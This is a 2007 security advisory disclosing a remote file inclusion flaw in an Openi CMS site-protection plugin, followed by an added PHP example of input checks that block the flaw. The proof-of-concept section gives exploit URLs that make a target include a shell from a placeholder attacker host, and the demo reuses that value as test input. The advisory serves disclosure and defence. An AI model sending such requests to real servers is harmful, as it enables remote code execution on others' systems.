From:y3dips <y3dips_(at)_yahoo.com>
Date:12.02.2007
Subject:[ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion

------------------------------------------------------------------------------------
[ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion
------------------------------------------------------------------------------------

Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : February, 11 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv64-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Internal range (site protection), version: 1.0
Openi CMS plugins (http://www.openi-cms.org)
URL : http://www.openi-cms.org
Download-path : http://www.openi-cms.org/oi-download.php/45/file_src/oi_plugin_site_protection_1_0.zip


Description : With this plugin you can release page ranges only to certain users. The user
must authenticate with a user name and password. Several users can be created
for a page range. Users and the pages to be protected are created in the
editorial environment by the administrator.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

The variable "oi_dir" (the $config["oi_dir"] array entry) in index.php is not properly sanitized before it is used in require_once().

---------------index.php --------------------
...
<?PHP
global $config;
require_once($config["oi_dir"]."/base/sitemap_classes.php");

class plg_site_protection extends Plugin {
...
----------------------------------------------


An attacker can exploit this vulnerability with a simple PHP injection script.

Poc/Exploit:
~~~~~~~~~~~~

http://target-openi/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://attacker/shell.php?

Notes:
~~~~~~

I have to change the variable "oi_dir" to "openi_dir" to get the CMS to work (config file),
but then you just change the exploit to

http://target-openi/open-admin/plugins/site_protection/index.php?config%5bopeni_dir%5d=http://attacker/shell.php?

It doesn't matter because the variable is still unsanitized.
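
Added example (not part of the advisory and not Openi CMS code): two checks a maintainer could place in front of the require_once shown above, whichever key name the config uses. It assumes the request parameter reaches $config through register_globals; the function names, the temporary install directory and the stub file are constructed for illustration.

```php
<?php
// Added example, not Openi CMS code. All function names are hypothetical.
// php.ini side of the fix: register_globals = Off, allow_url_include = Off.

// Guard 1: with register_globals on, ?config[oi_dir]=... overwrites $config,
// so a request parameter named "config" is treated as tampering.
function oi_request_sets_config(array $get, array $post, array $cookie): bool
{
    return isset($get['config']) || isset($post['config']) || isset($cookie['config']);
}

// Guard 2: accept oi_dir only when the resolved file is a local path inside
// the trusted install directory; returns the canonical path to require.
function oi_safe_include_path(string $oiDir, string $relative, string $trustedBase): string
{
    // Reject URL and stream-wrapper values (http://, ftp://, php://, data:).
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $oiDir)) {
        throw new RuntimeException('oi_dir must be a local path');
    }
    $base = realpath($trustedBase);
    $path = realpath($oiDir . '/' . $relative);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('include path is not inside the install directory');
    }
    return $path;
}

// Constructed demo: a temporary directory stands in for the CMS install.
$install = sys_get_temp_dir() . '/oi_demo_' . getmypid();
mkdir($install . '/base', 0700, true);
file_put_contents($install . '/base/sitemap_classes.php', "<?php // stub\n");

// Constructed request, shaped like the query string in the advisory.
$get = ['config' => ['oi_dir' => 'http://attacker/shell.php?']];
echo 'request sets config: ', var_export(oi_request_sets_config($get, [], []), true), "\n";

foreach ([$install, $get['config']['oi_dir'], $install . '/base/../..'] as $candidate) {
    try {
        $file = oi_safe_include_path($candidate, 'base/sitemap_classes.php', $install);
        echo "accepted: $file\n";
    } catch (RuntimeException $e) {
        echo "rejected: $candidate ({$e->getMessage()})\n";
    }
}
```

Only the first candidate, the install directory itself, is accepted; the URL value and the path that climbs out of the install directory are both rejected.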

---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ my lovely ana
~ k-159 (never stop advising [pushing] me :P), the_day (echo young evil thinker),
~ and all echo staff
~ str0ke, waraxe, negative
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~~~

y3dips|| echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/
